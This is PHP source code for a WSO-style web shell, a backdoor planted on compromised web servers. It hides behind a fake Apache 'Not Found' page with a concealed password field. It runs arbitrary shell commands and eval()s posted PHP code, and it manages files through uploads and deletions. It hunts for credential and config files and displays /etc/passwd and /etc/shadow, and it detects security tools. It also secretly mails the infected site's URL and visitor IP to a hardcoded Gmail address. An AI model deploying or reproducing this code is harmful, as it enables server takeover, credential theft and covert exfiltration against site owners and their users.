@set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? 
array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . 
-type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo 
\'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n 
.logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( 
(req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n 
for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." 
Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. 
\'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit 
value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). 
\' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? 
\'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = 
array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = 
"document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) 
echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } 